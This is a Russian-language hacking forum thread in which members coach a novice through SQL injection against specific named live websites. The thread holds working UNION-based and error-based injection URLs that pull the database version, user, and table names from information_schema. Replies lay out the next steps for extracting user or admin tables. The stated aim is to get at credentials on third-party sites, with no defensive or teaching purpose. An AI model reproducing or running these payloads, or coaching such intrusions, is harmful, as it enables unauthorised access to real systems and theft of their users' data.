Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    Как понять? что это?

    The used SELECT statements have a different number of columns
     
  2. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    дело в том, что файлы в phorum не аплоадятся, а заносятся в БД.
     
    1 person likes this.
  3. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    количество колонок не совпадают
     
    _________________________
  4. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    http://expert-poisk.ru/spravka.php?act=show_cat&cat=30+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/**/

    везде подставляю version() и не чего не выводит? Почему?
     
  5. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    а минус кто ставит будет?

    -30+union+....

    вторая Колонка <title></title>
     
    _________________________
  6. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    спасибо! ;)
     
  7. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    http://expert-poisk.ru/spravka.php?act=show_cat&cat=-30+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/**/

    узнал я

    database() - expert_poisk
    version() - 5.0.77
    user() - expert_poisk@localhost

    дальеше что делать надо?
     
  8. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    а дальше читать статьи :mad:
     
  9. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    Кинь сыль плиз?
     
  10. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886

    дальше вытащи имена таблиц,найдешь интересную таблицу(в смысле таблица узеров или админов)

    узнай колонки таблицы,а потом select из таблицы..

    понял?
     
    _________________________
  11. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    А есть ФАК более менее понятный для новичка!

    понял что из базы expert_poisk надо вытащить users!
    только как?

    http://expert-poisk.ru/spravka.php?act=show_cat&cat=-30+union+select+1,users,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+expert_poisk/**/

    Пишет:

    Table 'expert_poisk.expert_poisk' doesn't exist
     
  12. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    ТЫЦ
     
  13. b82a

    b82a Elder - Старейшина

    Joined:
    7 Feb 2010
    Messages:
    150
    Likes Received:
    48
    Reputations:
    25
    Дак expert_poisk это БД а не таблица. Читай что дали выше
     
  14. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Да, но в ней нет юзеров.
    Делай так:
    Потом: limit+2,1; limit+3,1 и т.д., пока не найдешь то что тебе нужно.

    Или можно так:
    Не забываем про то, что функции group_concat по дефолту ограничение - 1024 символа на вывод.
     
    #12974 CyberHunter, 16 May 2010
    Last edited by a moderator: 16 May 2010
  15. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    2CyberHunter, group_concat
    и выводит не все таблицы, а сколько позволит ограничение вывода
     
  16. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    А это скула?

    http://www.modvlad.ru/gallery/list.php?imagelib_cid=www
     
  17. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    2geforce, с чего ты взял? Скуллы не вижу, либо мой браузер неверно отображает пагу (со смарта)
     
    #12977 Bb0y, 16 May 2010
    Last edited: 16 May 2010
  18. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    собственно вопрос: можно как нибудь узнать полный путь к сайту если вывод ошибок отключен?
     
    _________________________
  19. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    http://www.rokk.ru/index.php?cat=50&item=-21%20or%20(select%20count(*)from(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(mid((select%20table_name%20from%20information_schema.tables%20limit%2019,1),1,20),floor(rand(0)*2)))

    SESSION_STATUS1
    тут что такое 1 ??
    как убрать ?
     
  20. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Зачем убирать? Просто не учитывать. А появляется из-за floor(rand(0)*2)

    поставь floor(rand(0)*100) - будут другие циферьки
     
Thread Status:
Not open for further replies.